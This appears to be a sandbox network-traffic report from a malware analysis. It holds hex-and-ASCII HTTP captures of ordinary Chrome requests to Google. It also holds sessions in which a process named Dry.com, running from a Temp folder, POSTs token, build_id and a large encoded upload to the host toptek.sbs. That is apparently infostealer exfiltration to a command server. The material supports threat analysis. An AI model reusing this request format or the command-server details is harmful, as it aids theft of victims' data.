                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:38 GMT
                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC372INData Raw: 31 37 39 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                                                  Data Ascii: 1794)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                                  Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                                  Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC112INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 32 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700322,3701384,102278205],"is_backup_bar":false},"p
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC274INData Raw: 31 30 62 0d 0a 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 5c 75 30 30 33 64 74 68 69 73 3b 5c 6e 74 72 79 7b 5c 6e 5f 2e 78 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 21 61 2e 6a 29 69 66 28 63 20 69 6e 73 74 61 6e 63 65 6f 66 20 41 72 72 61 79 29 66 6f 72 28 76 61 72 20 64 20 6f 66 20 63 29 5f 2e 78 64 28 61 2c 62 2c 64 29 3b 65 6c 73
                                                                                                                                                                                                                                                                                  Data Ascii: 10bage_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){var window\u003dthis;\ntry{\n_.xd\u003dfunction(a,b,c){if(!a.j)if(c instanceof Array)for(var d of c)_.xd(a,b,d);els
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 38 30 30 30 0d 0a 61 2e 43 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e
                                                                                                                                                                                                                                                                                  Data Ascii: 8000a.C,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(e)}\ntry{\n
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 74 68 69 73 2e 6e 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 4b 64 5c 75 30 30 33 64 5b 47 64 28 5c 22 64 61 74 61 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 5c 22 29 2c 47 64 28 5c 22 68 74 74 70 73 5c 22 29 2c 47 64 28 5c 22 6d 61 69 6c 74 6f 5c 22 29 2c 47 64 28 5c 22 66 74 70 5c 22 29 2c 6e 65 77 20 5f 2e 46 64 28 61 5c 75 30 30 33 64 5c 75 30 30 33 65 2f 5e 5b 5e 3a 5d 2a 28 5b 2f 3f 23 5d 7c 24 29 2f 2e 74 65 73 74 28 61 29 29 5d 3b 5f 2e 4c 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 2b 5c 22 5c 22 7d 7d 3b 5f 2e 4d 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74
                                                                                                                                                                                                                                                                                  Data Ascii: this.nh\u003da}};_.Kd\u003d[Gd(\"data\"),Gd(\"http\"),Gd(\"https\"),Gd(\"mailto\"),Gd(\"ftp\"),new _.Fd(a\u003d\u003e/^[^:]*([/?#]|$)/.test(a))];_.Ld\u003dclass{constructor(a){this.i\u003da}toString(){return this.i+\"\"}};_.Md\u003dnew _.Ld(_.Hd?_.Hd.empt
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC1390INData Raw: 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 65 7c 7c 62 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 5c 22 6e 6f 6e 63 65 5c 22 29 7c 7c 5c 22 5c 22 7d 3b 5c 6e 5f 2e 24 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 4d 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6e 75 6d 62 65 72 5c 22 7d 3b 5f 2e 61 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 72 65 74 75 72 6e 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c
                                                                                                                                                                                                                                                                                  Data Ascii: \u003dnull?\"\":b.nonce||b.getAttribute(\"nonce\")||\"\"};\n_.$d\u003dfunction(a){var b\u003d_.Ma(a);return b\u003d\u003d\"array\"||b\u003d\u003d\"object\"\u0026\u0026typeof a.length\u003d\u003d\"number\"};_.ae\u003dfunction(a,b,c){return _.sb(a,b,c,!1)!\


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  10192.168.2.449756142.250.181.1324433808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:38 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:38 GMT
                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  11192.168.2.44976694.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:42 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----LFUK68QQ1DJEUA1VAIW4
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:42 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 4c 46 55 4b 36 38 51 51 31 44 4a 45 55 41 31 56 41 49 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------LFUK68QQ1DJEUA1VAIW4Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------LFUK68QQ1DJEUA1VAIW4Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------LFUK68QQ1DJEUA1VAIW4Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:43 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  12192.168.2.44976894.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----Q9RQQIMOZU3E3EKX4OHV
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 213453
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 51 39 52 51 51 49 4d 4f 5a 55 33 45 33 45 4b 58 34 4f 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------Q9RQQIMOZU3E3EKX4OHVContent-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------Q9RQQIMOZU3E3EKX4OHVContent-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------Q9RQQIMOZU3E3EKX4OHVCont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                                                  Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
